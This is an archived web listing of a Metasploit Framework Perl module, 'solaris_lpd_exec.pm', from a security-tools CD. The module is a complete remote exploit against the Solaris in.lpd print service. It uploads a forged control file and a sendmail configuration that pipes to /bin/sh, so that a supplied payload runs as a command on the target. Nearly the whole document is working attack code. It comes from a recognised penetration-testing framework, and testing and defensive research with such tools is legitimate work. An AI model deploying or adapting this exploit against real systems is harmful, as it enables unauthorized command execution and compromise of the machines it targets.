home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / solaris_lpd_exec.pm < prev    next >
Encoding:
Perl POD Document  |  2006-06-30  |  5.0 KB  |  207 lines
  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::solaris_lpd_exec;
  11. use base "Msf::Exploit";
  12. use IO::Socket;
  13. use IO::Select;
  14. use strict;
  15. use Pex::Text;
  16.  
  17. my $advanced = { };
  18.  
  19. my $info =
  20.   {
  21.     'Name'        => 'Solaris LPD Command Execution',
  22.     'Version'    => '$Revision: 1.11 $',
  23.     'Authors'    =>
  24.       [
  25.         'H D Moore <hdm [at] metasploit.com>',
  26.         'Dino Dai Zovi <ddz [at] theta44.org>',
  27.       ],
  28.  
  29.     'Arch'        => [ ],
  30.     'OS'        => [ 'solaris' ],
  31.     'Priv'        => 1,
  32.  
  33.     'UserOpts'  =>
  34.       {
  35.         'RHOST' => [1, 'ADDR', 'The target address'],
  36.         'RPORT' => [1, 'PORT', 'The LPD server port', 515],
  37.       },
  38.  
  39.     'Payload' =>
  40.       {
  41.         'Space'    => 8192,
  42.         'Keys'     => ['cmd'],
  43.       },
  44.  
  45.     'Description'  => Pex::Text::Freeform(qq{
  46.         This module exploits an arbitrary command execution flaw in the in.lpd
  47.         service shipped with all versions of Sun Solaris up to and including 8.0.
  48.         This module uses a technique discovered by Dino Dai Zovi to exploit the flaw
  49.         without needing to know the resolved name of the attacking system.
  50. }),
  51.  
  52.     'Refs'  =>
  53.       [
  54.         ['OSVDB', '15131'],
  55.         ['BID',    '3274'],
  56.         ['MIL',      '63'],
  57.       ],
  58.  
  59.     'DefaultTarget' => 0,
  60.     'Targets' => [['No Target Needed']],
  61.  
  62.     'Keys'  => ['lpd'],
  63.  
  64.     'DisclosureDate' => 'Aug 31 2001',
  65.   };
  66.  
  67. sub new {
  68.     my $class = shift;
  69.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  70.     return($self);
  71. }
  72.  
  73. sub Exploit {
  74.     my $self = shift;
  75.     my $target_host = $self->GetVar('RHOST');
  76.     my $target_port = $self->GetVar('RPORT');
  77.     my $target_path = $self->GetVar('RPATH');
  78.     my $shellcode   = $self->GetVar('EncodedPayload')->RawPayload;
  79.     my $res;
  80.  
  81.     # This is the temporary path created in the spool directory
  82.     my $spath = "/var/spool/print";
  83.  
  84.     # We use one connection to configure the spool directory
  85.     my $s = Msf::Socket::Tcp->new
  86.       (
  87.         'PeerAddr'  => $target_host,
  88.         'PeerPort'  => $target_port,
  89.         'LocalPort' => $self->GetVar('CPORT'),
  90.         'SSL'       => $self->GetVar('SSL'),
  91.       );
  92.     if ($s->IsError) {
  93.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  94.         return;
  95.     }
  96.  
  97.     # Send the job request command with the faked printer spool
  98.     $s->Send("\x02"."metasploit:framework\n");
  99.     $res = $s->Recv(1, 5);
  100.     if (ord($res) != 0) {
  101.         $self->PrintLine("[*] The target did not accept our job request command");
  102.         return;
  103.     }
  104.  
  105.     # The job ID is squashed down to three decimal digits
  106.     my $jid = ($$ % 1000).unpack("H*",pack('N', time() + $$));
  107.  
  108.     # The control file
  109.     my $control =
  110.       "H"."metasploit\n".
  111.       "P"."\\\"-C".$spath."/".$jid."mail.cf\\\" nobody\n".
  112.       "f"."dfA".$jid."config\n".
  113.       "f"."dfA".$jid."script\n";
  114.  
  115.     # The mail configuration file
  116.     my $mailcf =
  117.       "V8\n".
  118.       "\n".
  119.       "Ou0\n".
  120.       "Og0\n".
  121.       "OL0\n".
  122.       "Oeq\n".
  123.       "OQX/tmp\n".
  124.       "\n".
  125.       "FX|/bin/sh $spath/".$jid."script\n".
  126.       "\n".
  127.       "S3\n".
  128.       "S0\n".
  129.       "R\$+     \$#local \$\@blah \$:blah\n".
  130.       "S1\n".
  131.       "S2\n".
  132.       "S4\n".
  133.       "S5\n".
  134.       "\n".
  135.       "Mlocal  P=/bin/sh, J=S, S=0, R=0, A=sh $spath/".$jid."script\n".
  136.       "Mprog   P=/bin/sh, J=S, S=0, R=0, A=sh $spath/".$jid."script\n";
  137.  
  138.     $self->PrintLine("[*] Configuring the spool directory...");
  139.     if ( ! $self->SendFile($s, 2, "cfA".$jid."metasploit", $control) ||
  140.         ! $self->SendFile($s, 3, $jid."mail.cf", $mailcf)        ||
  141.         ! $self->SendFile($s, 3, $jid."script", $shellcode)
  142.       ) { $s->Close; return }
  143.  
  144.     $self->PrintLine('');
  145.  
  146.     # We use another connection to trigger the code execution
  147.     my $t = Msf::Socket::Tcp->new
  148.       (
  149.         'PeerAddr'  => $target_host,
  150.         'PeerPort'  => $target_port,
  151.         'LocalPort' => $self->GetVar('CPORT'),
  152.         'SSL'       => $self->GetVar('SSL'),
  153.       );
  154.     if ($t->IsError) {
  155.         $self->PrintLine('[*] Error creating socket: ' . $t->GetError);
  156.         return;
  157.     }
  158.  
  159.     # Send the job request command with the cascaded printer spool
  160.     $t->Send("\x02"."localhost:metasploit\n");
  161.     $res = $t->Recv(1, 5);
  162.     if (ord($res) != 0) {
  163.         $self->PrintLine("[*] The target did not accept our job request command");
  164.         return;
  165.     }
  166.  
  167.     $self->PrintLine("[*] Triggering the vulnerable call to the mail program...");
  168.     if ( ! $self->SendFile($t, 2, "cfA".$jid."metasploit", $control) ||
  169.         ! $self->SendFile($t, 3, "dfa".$jid."config", $mailcf)
  170.       ) { $t->Close; return }
  171.  
  172.     $t->Close;
  173.  
  174.     $self->PrintLine("[*] Waiting 60 seconds for the payload to execute...\n");
  175.     sleep(60);
  176.  
  177.     return;
  178. }
  179.  
  180. sub SendFile {
  181.     my $self = shift;
  182.     my $sock = shift;
  183.     my $type = shift;
  184.     my $name = shift;
  185.     my $data = shift;
  186.  
  187.     $sock->Send(chr($type) .length($data). " $name\n");
  188.     my $res = $sock->Recv(1, 5);
  189.     if (ord($res) != 0) {
  190.         $self->PrintLine("[*] The target did not accept our control file command ($name)");
  191.         return;
  192.     }
  193.  
  194.     $sock->Send($data);
  195.     $sock->Send("\x00");
  196.     $res = $sock->Recv(1, 5);
  197.     if (ord($res) != 0) {
  198.         $self->PrintLine("[*] The target did not accept our control file data ($name)");
  199.         return;
  200.     }
  201.  
  202.     $self->PrintLine(sprintf("[*]     Uploaded %.4d bytes >> $name", length($data)));
  203.     return 1;
  204. }
  205.  
  206. 1;
  207.